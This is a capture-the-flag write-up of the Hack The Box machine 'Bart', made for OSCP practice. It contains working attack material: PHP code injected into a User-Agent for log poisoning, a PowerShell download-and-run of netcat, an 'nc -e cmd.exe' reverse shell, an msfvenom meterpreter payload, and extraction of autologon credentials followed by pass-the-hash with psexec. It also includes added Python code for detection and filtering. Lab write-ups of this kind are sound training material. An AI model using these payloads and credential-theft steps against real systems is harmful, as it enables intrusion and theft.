Hack the Box - Bart Write up



I felt like Bart was a pretty good box. It’s extremely similar to some of the boxes in the OSCP labs, and the avenue used to get code execution I’ve already seen at least twice so far. If you are taking the OSCP (I currently am) I highly recommend going through the motions of this box because Bart is a prime example of a potential box you would get, with very similar attack vectors that you need to be able to exploit. I plan on editing this write-up a bit later to include how to complete this box without the use of Metasploit, but only after I get some sleep since I’ve been up all night. Sorry in advance if there are any quality control mistakes; it’s too early for me.

Tools Used


Initial Scanning

Like with every Hack The Box machine, let's begin with an nmap scan against Bart.

root@dastinia:~/htb/bart# nmap -sV -sC -oA nmap/bart_initscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-11 21:17 EDT
Nmap scan report for
Host is up (0.18s latency).
Not shown: 999 filtered ports
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.00 seconds

We see that the only available service is the IIS web server on port 80. From the IIS 10.0 server header we can also infer that this is likely a Windows Server 2016 or Windows 10 system under the hood.

Enumeration Port 80 (forum.bart.htb, WordPress)

From our nmap scan we can see that we are being redirected automatically to forum.bart.htb. Since HTB doesn’t provide global DNS, we aren’t going to be able to resolve the name. We can add entries in our /etc/hosts file pointing both bart.htb and forum.bart.htb at the box.

adding the /etc/hosts entry

root@dastinia:~/htb/bart# echo " forum.bart.htb" >> /etc/hosts
root@dastinia:~/htb/bart# echo " bart.htb" >> /etc/hosts

Visiting forum.bart.htb in a browser brings us to a snazzy single-page WordPress site.

"Homepage of forum.bart.htb"

Attempting to access the WordPress login page ends up with an error: "The page cannot be displayed because an internal server error has occurred." This is strange because there’s not much else going on with the site, so it is likely some sort of rabbit hole.

Running gobuster on forum.bart.htb doesn't reveal anything extremely interesting. Thinking that maybe there is some hidden content within the site, we mirror it with wget and search for interesting content like emails, extra domain names, or hidden pages.

We were able to discover a few potential emails/usernames, but nothing that stood out on its own. We did notice that the bart developer Harvey Potter (h.potter@bart.htb) is the only member of the team not displayed on the main site, but whose information is stored in a comment on the page.

mirroring site locally

root@dastinia:~/htb/bart/bart_wpsite# wget -r http://forum.bart.htb
root@dastinia:~/htb/bart/bart_wpsite# grep -RiP "bart" forum.bart.htb/
forum.bart.htb/index.html:<link rel='stylesheet' id='sydney-ie9-css'  href='http://forum.bart.htb/wp-content/themes/sydney/css/ie9.css?ver=4.8.2' type='text/css' media='all' />
forum.bart.htb/index.html:                                                      <h1 class="site-title"><a href="#" rel="home">BART</a></h1>
forum.bart.htb/index.html:                                                                                                                                                              <div class="pos">CEO@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:s.brown@bart.local" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                              <div class="pos">CEO@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:d.simmons@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:r.hilton@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                                                              <div class="pos">Developer@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                                      <li><a class="mail" href="mailto:h.potter@bart.htb" target="_blank"><i class="fa">M</i></a></li>

a better grep to extract the email addresses

root@dastinia:~/htb/bart/bart_wpsite# grep -RiE -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b"

Discovering Monitoring Portal with Wfuzz

Taking a step back and attempting to enumerate the root of the domain, bart.htb, with gobuster, you discover that the site seems to be returning some kind of content on every request.

gobuster on bart.htb

root@dastinia:~/htb/bart# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://bart.htb/ -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_bart

Gobuster v1.2                OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   : http://bart.htb/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,403,200
[+] Extensions   : .php,.html
/index (Status: 200)
/news (Status: 200)
/crack (Status: 200)
/download (Status: 200)
/2006 (Status: 200)
/images (Status: 200)
/serial (Status: 200)
/warez (Status: 200)
/full (Status: 200)
/12 (Status: 200)
/contact (Status: 200)
/about (Status: 200)
/search (Status: 200)
/spacer (Status: 200)
/logo (Status: 200)
/privacy (Status: 200)
/11 (Status: 200)
/new (Status: 200)
/blog (Status: 200)
/rss (Status: 200)
/home (Status: 200)
/faq (Status: 200)
/cgi-bin (Status: 200)
/10 (Status: 200)
/archives (Status: 200)
/products (Status: 200)
/sitemap (Status: 200)
/default (Status: 200)
/img (Status: 200)
/2005 (Status: 200)
/1 (Status: 200)
/09 (Status: 200)
/links (Status: 200)
/01 (Status: 200)
/08 (Status: 200)
/06 (Status: 200)
/2 (Status: 200)
/07 (Status: 200)
/articles (Status: 200)
/login (Status: 200)
/keygen (Status: 200)
/article (Status: 200)

Visiting the page in a browser you see that every path you attempt to go to returns the same error page. Returning a custom error page with a 200 status, instead of a standard 404 response stating that something was wrong, is pretty common in modern web applications.

This renders tools like gobuster, dirb or dirbuster basically useless for gathering information, since the results will be filled with false positives or will require additional post-processing to figure out what’s actually real.

"Error Page Returned"

To circumvent this we can use wfuzz as our directory brute forcer and filter the results based on a character-count baseline. As you can see below, wfuzz reports the error page as having 158607 characters in the response. We can use this as our baseline and hide every response with 158607 characters using the --hh flag, which in turn only shows us pages with different (unique) content.

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.2.9 - The Web Fuzzer                         *

Target: http://bart.htb/FUZZ/
Total requests: 220560

ID      Response   Lines      Word         Chars          Payload

000001:  C=302      0 L        0 W            0 Ch        "# directory-list-2.3-medium.txt"
000002:  C=302      0 L        0 W            0 Ch        "#"
000009:  C=302      0 L        0 W            0 Ch        "# Suite 300, San Francisco, California, 94105, USA."
000003:  C=302      0 L        0 W            0 Ch        "# Copyright 2007 James Fisher"
000004:  C=302      0 L        0 W            0 Ch        "#"
000005:  C=302      0 L        0 W            0 Ch        "# This work is licensed under the Creative Commons"
000016:  C=200    630 L     3775 W        158607 Ch       "images"
000018:  C=200    630 L     3775 W        158607 Ch       "2006"
000017:  C=200    630 L     3775 W        158607 Ch       "download"
000026:  C=200    630 L     3775 W        158607 Ch       "about"
000021:  C=200    630 L     3775 W        158607 Ch       "serial"
000025:  C=200    630 L     3775 W        158607 Ch       "contact"
000027:  C=200    630 L     3775 W        158607 Ch       "search"
000028:  C=200    630 L     3775 W        158607 Ch       "spacer"
000022:  C=200    630 L     3775 W        158607 Ch       "warez"
000023:  C=200    630 L     3775 W        158607 Ch       "full"
000019:  C=200    630 L     3775 W        158607 Ch       "news"
000024:  C=200    630 L     3775 W        158607 Ch       "12"
000032:  C=200    630 L     3775 W        158607 Ch       "blog"
000029:  C=200    630 L     3775 W        158607 Ch       "privacy"
000034:  C=200    630 L     3775 W        158607 Ch       "10"
000073:  C=200    630 L     3775 W        158607 Ch       "category"
000031:  C=200    630 L     3775 W        158607 Ch       "logo"
000080:  C=200    630 L     3775 W        158607 Ch       "media"
000075:  C=200    630 L     3775 W        158607 Ch       "content"
000033:  C=200    630 L     3775 W        158607 Ch       "new"
000079:  C=200    630 L     3775 W        158607 Ch       "press"
000076:  C=200    630 L     3775 W        158607 Ch       "14"
000083:  C=200    630 L     3775 W        158607 Ch       "icons"
000081:  C=200    630 L     3775 W        158607 Ch       "templates"
000082:  C=200    630 L     3775 W        158607 Ch       "services"
000020:  C=200    630 L     3775 W        158607 Ch       "crack"
000030:  C=200    630 L     3775 W        158607 Ch       "11"
000035:  C=200    630 L     3775 W        158607 Ch       "cgi-bin"
000077:  C=200    630 L     3775 W        158607 Ch       "main"

Using Wfuzz to hide the error page responses

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/ --hh 158607

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.2.9 - The Web Fuzzer                         *

Target: http://bart.htb/FUZZ/
Total requests: 220560

ID      Response   Lines      Word         Chars          Payload

000014:  C=302      0 L        0 W            0 Ch        ""
000067:  C=200    548 L     2412 W        35529 Ch        "forum"
001614:  C=200     80 L      221 W         3423 Ch        "monitor"
002385:  C=200    548 L     2412 W        35529 Ch        "Forum"
019837:  C=200     80 L      221 W         3423 Ch        "Monitor"

From our results we can see that there’s content being served from the “forum” and “monitor” directories, with “forum” being the forum.bart.htb site we already looked at.
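The baseline filter wfuzz applies with --hh, reimplemented as an added example (not part of the original write-up or of wfuzz). The sample response table is constructed from the wfuzz output above; the `tolerance` parameter goes beyond the page by also collapsing catch-all pages that echo the requested path and so vary by a few bytes per request.

```python
"""Baseline filtering of directory-brute-force results, as wfuzz --hh does."""
from collections import Counter

# Constructed sample: (payload, status, chars) as wfuzz reports them.
SAMPLE_RESPONSES = [
    ("", 302, 0),
    ("images", 200, 158607),
    ("2006", 200, 158607),
    ("download", 200, 158607),
    ("about", 200, 158607),
    ("forum", 200, 35529),
    ("monitor", 200, 3423),
    ("warez", 200, 158607),
    ("Forum", 200, 35529),
    ("Monitor", 200, 3423),
]


def catch_all_baseline(responses):
    """Return (status, chars) of the most frequent response: on a site that
    answers every path with the same page, that is the catch-all error page."""
    counts = Counter((status, chars) for _, status, chars in responses)
    (status, chars), _ = counts.most_common(1)[0]
    return status, chars


def filter_catch_all(responses, tolerance=0):
    """Keep only responses that differ from the baseline page.
    tolerance > 0 also drops near-identical sizes, for catch-all pages that
    embed the requested path and therefore are not byte-for-byte identical."""
    base_status, base_chars = catch_all_baseline(responses)
    return [r for r in responses
            if not (r[1] == base_status and abs(r[2] - base_chars) <= tolerance)]


def unique_payloads(responses, tolerance=0):
    """Payload names that returned something other than the catch-all page."""
    return [payload for payload, _, _ in filter_catch_all(responses, tolerance)]
```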


Visiting monitor.bart.htb in our browser reveals the application “PHP Server Monitor v3.2.1”.

"Monitoring Application"

After trying the usual Hack The Box username:password combinations with no luck, we begin looking for another avenue into this application. PHP Server Monitor has a password reset function which only takes a username. When you attempt a password reset for a user that doesn’t exist you get the following error.

"Forgot my password -- fail"

With this knowledge we can attempt to enumerate usernames in a targeted manner using the information gathered from forum.bart.htb.

I compiled a short list of possible user names from the site:

potential usernames compiled from forum.bart.htb

root@dastinia:~/htb/bart# cat names.txt

We can use Burp Suite Intruder coupled with the simple list payload to perform this attack.

"Burpsuite Simple List Payload"

This is how we set up Burp Suite Intruder to perform our attack.

"Setting up burp suite intruder"

"Intruder Results"

From the results of our Intruder attack we see that we have two valid usernames: harvey and daniel.

After some educated guessing you will discover a valid username:password combination of harvey:potter.

When you attempt to authenticate you are redirected to monitor.bart.htb, which fails to resolve just as forum.bart.htb did. We add monitor.bart.htb to our /etc/hosts file and attempt to re-authenticate with our newly found credentials.

root@dastinia:~# echo " monitor.bart.htb " >> /etc/hosts

After we re-authenticate we are greeted with the following page.

"Authenticating to Server Monitor"

Browsing around, you see there is an entry for the “Internal Chat” service.

Viewing the details of “Internal Chat” reveals that there is another application on a different domain, “internal-01.bart.htb”.

"Discovering internal-01.bart.htb"


Simple Chat Source Code Discovery & Account Registration

Visiting internal-01.bart.htb in our browser reveals the login page of bart’s internal “dev chat”.

"Dev chat internal login page"

While running gobuster & sqlmap in the background, some googling for “simple chat” turns up the following GitHub repo: https://github.com/magkopian/php-ajax-simple-chat. To validate that these two applications are the same, I inspected the css/chat_global.css file and sure enough it was the same application. Looking at the application’s code we see that there is registration functionality. The application doesn’t directly give you an option to register for an account, but it seems shoddily built, so we can likely craft the registration request by hand and hope nothing has changed (we know the location and the parameters required to register an account from auditing the register.php source code).

Sure enough, we are able to register an account with a username:password of medic:medicmedic on the internal dev chat by crafting our request just right.

"Creating Account on Dev Chat"

"Authenticating to Internal Chat"

Getting RCE through LFI & Log Poisoning

Clicking the log link causes two alerts to appear that seemingly do nothing. Inspecting the original application code, there are no references to any “log” functionality, so this must be a third-party modification. After some fiddling & inspecting the request history in Burp Suite, you will see that the application records the username & your User-Agent in a log file, as seen below.

"Logged useragent"

Since we control our own User-Agent, we can use this to execute PHP code by visiting the log file page.

GET //log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php exec('whoami'); ?> Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4o03rnotk1l5b2ols3mkmqm8u9
Connection: close
Upgrade-Insecure-Requests: 1

"Code Execution Success"
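From the defender's side, both the password-reset username enumeration against the monitor and the User-Agent log poisoning above leave a footprint in the IIS access log. The following is an added example (not code from the write-up, the box, or either application) that scans IIS W3C log lines for PHP tags in the User-Agent and for bursts of reset POSTs from one client; the log lines are constructed, and the reset endpoint path and query string are assumed, not taken from the page.

```python
"""Detection over IIS W3C log lines for the two behaviours described above:
PHP tags carried in the User-Agent (log poisoning) and bursts of
password-reset requests from one client (username enumeration)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Default IIS W3C field order; IIS writes spaces inside a field as '+'.
FIELDS = ("date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
          "cs-username c-ip cs(User-Agent) cs(Referer) sc-status "
          "sc-substatus sc-win32-status time-taken").split()

# PHP open tags ("<?php" and the short echo tag "<?="); the UA is URL-decoded
# before matching so percent-encoded variants are caught too.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

# Assumed reset endpoint of the monitoring app (not taken from the page).
RESET_STEM, RESET_QUERY = "/index.php", "mod=user&action=forgot"

# Constructed sample log (not real traffic from the box).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2018-07-12 04:00:01 10.0.0.5 GET /log/log.php username=harvey&filename=log.php 80 - 10.0.0.9 <?php+exec('whoami');+?>+Mozilla/5.0 - 200 0 0 15
2018-07-12 04:00:02 10.0.0.5 GET /log/log.php username=harvey&filename=log.php 80 - 10.0.0.9 %3C%3Fphp+echo+1;+%3F%3E - 200 0 0 10
2018-07-12 04:00:03 10.0.0.5 GET /index.php - 80 - 10.0.0.7 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 5
2018-07-12 04:10:00 10.0.0.5 POST /index.php mod=user&action=forgot 80 - 10.0.0.9 Mozilla/5.0 - 200 0 0 20
2018-07-12 04:10:05 10.0.0.5 POST /index.php mod=user&action=forgot 80 - 10.0.0.9 Mozilla/5.0 - 200 0 0 20
2018-07-12 04:10:10 10.0.0.5 POST /index.php mod=user&action=forgot 80 - 10.0.0.9 Mozilla/5.0 - 200 0 0 20
2018-07-12 04:10:15 10.0.0.5 POST /index.php mod=user&action=forgot 80 - 10.0.0.9 Mozilla/5.0 - 200 0 0 20
2018-07-12 04:10:20 10.0.0.5 POST /index.php mod=user&action=forgot 80 - 10.0.0.9 Mozilla/5.0 - 200 0 0 20
2018-07-12 04:12:00 10.0.0.5 POST /index.php mod=user&action=forgot 80 - 10.0.0.7 Mozilla/5.0 - 200 0 0 20
"""


def parse_line(line):
    """Turn one W3C line into a dict, or None for comment/malformed lines."""
    if line.startswith("#"):
        return None
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["ua"] = unquote(rec["cs(User-Agent)"].replace("+", " "))
    rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
    return rec


def find_poisoned_user_agents(lines):
    """(client ip, uri stem, decoded UA) for every request whose UA holds a PHP tag."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        if PHP_TAG.search(rec["ua"]):
            hits.append((rec["c-ip"], rec["cs-uri-stem"], rec["ua"]))
    return hits


def find_reset_bursts(lines, threshold=5, window=timedelta(minutes=5)):
    """{client ip: most reset POSTs seen inside `window`} for clients reaching
    `threshold`; against a form that reveals whether a username exists this
    is the enumeration pattern described above."""
    stamps_by_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if (rec["cs-method"] == "POST" and rec["cs-uri-stem"] == RESET_STEM
                and RESET_QUERY in rec["cs-uri-query"]):
            stamps_by_ip[rec["c-ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):  # sliding window over sorted times
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), end - start + 1)
    return flagged
```

Two caveats the log alone does not cover: IIS does not record POST bodies, so the usernames tried are not visible, and log poisoning only matters when the log file is written inside the web root with an executable extension, as it is here.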

To speed this up I recommend having 2-3 Repeater tabs open: one to input commands into, and one to visit the log page to trigger the execution.

We upload & execute a 64-bit netcat binary onto the machine (important for later) so we can get an interactive shell.

I injected the following code into the User-Agent field. Make sure you remember to escape the inner double quotes with \.

<?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('','nc.exe')\""); ?>
<?php exec("nc.exe 6667 -e cmd.exe"); ?>

getting shell

root@dastinia:~# ncat -lnvp 6667
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6667
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

 Volume in drive C has no label.
 Volume Serial Number is F84E-9CF7

 Directory of C:\inetpub\wwwroot\internal-01\log

12/07/2018  04:06    <DIR>          .
12/07/2018  04:06    <DIR>          ..
12/07/2018  04:00               101 log.ph
12/07/2018  04:05             2,643 log.php
12/07/2018  04:01               303 log.txt
21/02/2018  20:44    <DIR>          Microsoft
12/07/2018  04:06            59,392 nc.exe
               4 File(s)         62,439 bytes
               3 Dir(s)  15,505,301,504 bytes free

nt authority\iusr

Privilege Escalation

Poking around the system you will see that there’s not much going on. It’s a pretty recent build of Windows, so that rules out a good chunk of kernel-based LPE exploits. Poking around the application folders you discover the password for the MySQL database, as seen below. You will realize that this was unhelpful information after attempting to use this password against all the user accounts present on the box.

C:\inetpub\wwwroot\internal-01\simple_chat\includes>type dbconnect.php
function db_connect() {
        $con = @mysqli_connect('localhost', 'harvey', '!IC4nB3Th3B3st?', 'internal_chat');
        if ($con === false) {
                return false;
        }
        mysqli_set_charset ($con , 'UTF-8');
        return $con;
}

Getting x64 meterpreter shell & impacket

Let's generate an x64 meterpreter payload and make an SMB share with impacket.

generate payload msfvenom

root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=6969 -f exe > 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

impacket-smb share

root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (,49813)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141
[*] User \BART authenticated successfully
[*] :::00::4141414141414141

setting up multihandler

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 6969
LPORT => 6969
msf exploit(multi/handler) > set ExitonSession False
ExitonSession => false
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on

executing our payload from the SMB share & getting a shell



msf exploit(multi/handler) >
[*] Sending stage (206403 bytes) to
[*] Meterpreter session 1 opened ( -> at 2018-07-14 11:44:39 -0400

Active sessions

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART -> (

The meterpreter session will die after some time, and the AV on the system will delete your payload after you execute it from the SMB share.

Recovering Administrator AutoLogon Credentials

At this point I did a good chunk of manual enumeration on the system. After manually performing the standard Windows privilege escalation techniques you discover that there are credentials stored in the Winlogon autologon registry key. Here are a few resources I felt are pretty decent at explaining the things you should look for in local Windows privilege escalation: Fuzzy Security - Windows Privilege Escalation Fundamentals, Pentestlab, and Daya Privilege Escalation.

For some reason I wasn’t getting the result I wanted when I performed this action with a regular shell. I’m going to investigate this tomorrow.

It did work with powershell running the following command: Get-ItemProperty -path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"

Since we are already using Metasploit for this box, there is a Metasploit post-exploitation module called windows_autologin which extracts any autologon credentials from the registry.

msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set SESSION 7
msf post(windows/gather/credentials/windows_autologin) > run

[*] Running against BART on session 7
[+] AutoAdminLogon=1, DefaultDomain=DESKTOP-7I3S68E, DefaultUser=Administrator, DefaultPassword=3130438f31186fbaf962f407711faddb
[*] Post module execution completed

Getting System with PTH/PSEXEC

Now that we have the Administrator's credentials, getting SYSTEM should be a snap.

We can perform a Pass the Hash attack with Metasploit’s various psexec modules. We need to add a route through our existing session so that the module can reach the SMB port 445 listening locally on the box. This can be achieved with Metasploit’s route add command.

msf> use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
SMBPass => 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\\\\kk\\\6969.exe
COMMAND => \\\kk\6969.exe
msf auxiliary(admin/smb/psexec_command) > set RHOSTS
msf auxiliary(admin/smb/psexec_command) > options

Module options (auxiliary/admin/smb/psexec_command):

   Name                  Current Setting                   Required  Description
   ----                  ---------------                   --------  -----------
   COMMAND               \\\kk\6969.exe        yes       The command you want to execute on the remote host
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT                 445                               yes       The Target port
   SERVICE_DESCRIPTION                                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                    no        The service display name
   SERVICE_NAME                                            no        The service name
   SMBDomain             .                                 no        The Windows domain to use for authentication
   SMBPass               3130438f31186fbaf962f407711faddb  no        The password for the specified username
   SMBSHARE              C$                                yes       The name of a writeable share on the server
   SMBUser               Administrator                     no        The username to authenticate as
   THREADS               1                                 yes       The number of concurrent threads
   WINPATH               WINDOWS                           yes       The name of the remote Windows directory
msf auxiliary(admin/smb/psexec_command) > route add 7
[*] Route added
msf auxiliary(admin/smb/psexec_command) > run

[+]       - Service start timed out, OK if running a command or non-service executable...
[*]       - checking if the file is unlocked
[*]       - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-]       - Command seems to still be executing. Try increasing RETRY and DELAY
[*]       - Getting the command output...
[*]       - Command finished with no output
[*]       - Executing cleanup...
[+]       - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/psexec_command) >
[*] Sending stage (206403 bytes) to
[*] Meterpreter session 8 opened ( -> at 2018-07-14 01:15:57 -0400

msf auxiliary(admin/smb/psexec_command) > sessions

Active sessions

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  7         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART -> (
  8         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BART -> (

msf auxiliary(admin/smb/psexec_command) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > sysinfo
Computer        : BART
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

That’s all for now. I’m pretty busy with OSCP & work, so hopefully the next few boxes are machines I already have write-ups completed for. I’ll also update this post on how to complete this box without Metasploit after I get some sleep.